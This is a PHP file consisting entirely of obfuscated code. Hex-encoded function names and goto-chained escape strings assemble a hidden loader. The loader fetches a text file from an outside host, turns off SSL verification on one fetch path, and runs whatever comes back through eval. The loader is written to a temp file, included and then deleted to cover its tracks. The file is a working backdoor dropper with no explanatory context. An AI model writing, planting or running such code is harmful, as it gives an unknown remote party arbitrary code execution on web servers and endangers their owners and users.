<?php
error_reporting(0);
$kutza=hex2bin('7379735f6765745f74656d705f646972');$ceujz=hex2bin('74656d706e616d');$clnqj=hex2bin('66696c655f7075745f636f6e74656e7473');$buxlc=hex2bin('756e6c696e6b');$ctgvn=hex2bin('666f70656e');$kyrwa=hex2bin('667772697465');$eszop=hex2bin('66636c6f7365'); $jrukhe=''; goto L2629695925F91A290;
L4655695925F91A2BF: $jrukhe.="\x69\x6c\x27\x29\x3b\x0a\x3f\x3e"; goto L7673695925F91A2C0;
L6410695925F91A2A6: $jrukhe.="\x61\x79\x28\x24\x68\x2c\x5b\x31\x39\x39"; goto L9291695925F91A2A7;
L1970695925F91A2A8: $jrukhe.="\x30\x5d\x29\x3b\x24\x63\x3d\x63\x75\x72"; goto L1092695925F91A2A9;
L1859695925F91A2B2: $jrukhe.="\x69\x6c\x65\x28\x21\x66\x65\x6f\x66\x28"; goto L1332695925F91A2B3;
L4698695925F91A2B4: $jrukhe.="\x65\x61\x64\x28\x24\x68\x2c\x31\x30\x32"; goto L7185695925F91A2BB;
L5733695925F91A2BC: $jrukhe.="\x24\x68\x29\x3b\x7d\x7d\x7d\x24\x63\x3f"; goto L9881695925F91A2BD;
L8411695925F91A29E: $jrukhe.="\x21\x24\x63\x29\x7b\x69\x66\x28\x66\x75"; goto L8146695925F91A29F;
L9881695925F91A2BD: $jrukhe.="\x65\x76\x61\x6c\x28\x22\x3f\x3e\x24\x63"; goto L1191695925F91A2BE;
L8158695925F91A2A5: $jrukhe.="\x73\x65\x74\x6f\x70\x74\x5f\x61\x72\x72"; goto L6410695925F91A2A6;
L8146695925F91A29F: $jrukhe.="\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69"; goto L2495695925F91A2A1;
L9400695925F91A298: $jrukhe.="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x74"; goto L9608695925F91A299;
L6815695925F91A2B0: $jrukhe.="\x65\x6e\x28\x24\x75\x2c\x27\x72\x27\x29"; goto L3036695925F91A2B1;
L1092695925F91A2A9: $jrukhe.="\x6c\x5f\x65\x78\x65\x63\x28\x24\x68\x29"; goto L6100695925F91A2AA;
L6100695925F91A2AA: $jrukhe.="\x3b\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73"; goto L2451695925F91A2AB;
L9291695925F91A2A7: $jrukhe.="\x31\x33\x3d\x3e\x31\x2c\x36\x34\x3d\x3e"; goto L1970695925F91A2A8;
L7117695925F91A2A2: $jrukhe.="\x69\x6e\x69\x74\x27\x29\x29\x7b\x24\x68"; goto L6492695925F91A2A3;
L1332695925F91A2B3: $jrukhe.="\x24\x68\x29\x29\x24\x63\x2e\x3d\x66\x72"; goto L4698695925F91A2B4;
L1489695925F91A29A: $jrukhe.="\x6f\x6d\x2f\x37\x37\x2e\x74\x78\x74\x27"; goto L8691695925F91A29B;
L9896695925F91A29D: $jrukhe.="\x74\x73\x28\x24\x75\x29\x3b\x69\x66\x28"; goto L8411695925F91A29E;
L7185695925F91A2BB: $jrukhe.="\x34\x29\x3b\x66\x63\x6c\x6f\x73\x65\x28"; goto L5733695925F91A2BC;
L3036695925F91A2B1: $jrukhe.="\x3b\x69\x66\x28\x24\x68\x29\x7b\x77\x68"; goto L1859695925F91A2B2;
L2451695925F91A2AB: $jrukhe.="\x65\x28\x24\x68\x29\x3b\x7d\x69\x66\x28"; goto L2893695925F91A2AC;
L6492695925F91A2A3: $jrukhe.="\x3d\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74"; goto L2442695925F91A2A4;
L4651695925F91A2AD: $jrukhe.="\x65\x74\x28\x27\x61\x6c\x6c\x6f\x77\x5f"; goto L3416695925F91A2AE;
L2442695925F91A2A4: $jrukhe.="\x28\x24\x75\x29\x3b\x63\x75\x72\x6c\x5f"; goto L8158695925F91A2A5;
L8691695925F91A29B: $jrukhe.="\x3b\x24\x63\x3d\x40\x66\x69\x6c\x65\x5f"; goto L6109695925F91A29C;
L2893695925F91A2AC: $jrukhe.="\x21\x24\x63\x26\x26\x69\x6e\x69\x5f\x67"; goto L4651695925F91A2AD;
L2495695925F91A2A1: $jrukhe.="\x73\x74\x73\x28\x27\x63\x75\x72\x6c\x5f"; goto L7117695925F91A2A2;
L3512695925F91A2AF: $jrukhe.="\x29\x29\x7b\x24\x68\x3d\x40\x66\x6f\x70"; goto L6815695925F91A2B0;
L9608695925F91A299: $jrukhe.="\x65\x70\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; goto L1489695925F91A29A;
L1191695925F91A2BE: $jrukhe.="\x22\x29\x3a\x64\x69\x65\x28\x27\x46\x61"; goto L4655695925F91A2BF;
L6109695925F91A29C: $jrukhe.="\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e"; goto L9896695925F91A29D;
L2629695925F91A290: $jrukhe.="\x3c\x3f\x70\x68\x70\x0a\x24\x75\x3d\x27"; goto L9400695925F91A298;
L3416695925F91A2AE: $jrukhe.="\x75\x72\x6c\x5f\x66\x6f\x70\x65\x6e\x27"; goto L3512695925F91A2AF;
L7673695925F91A2C0: $vberhd = $ceujz($kutza(), 'x'); if(function_exists($clnqj)){ $clnqj($vberhd, $jrukhe); } else { $hjln = $ctgvn($vberhd, 'w'); $kyrwa($hjln, $jrukhe); $eszop($hjln); } include($vberhd); $buxlc($vberhd);
?>
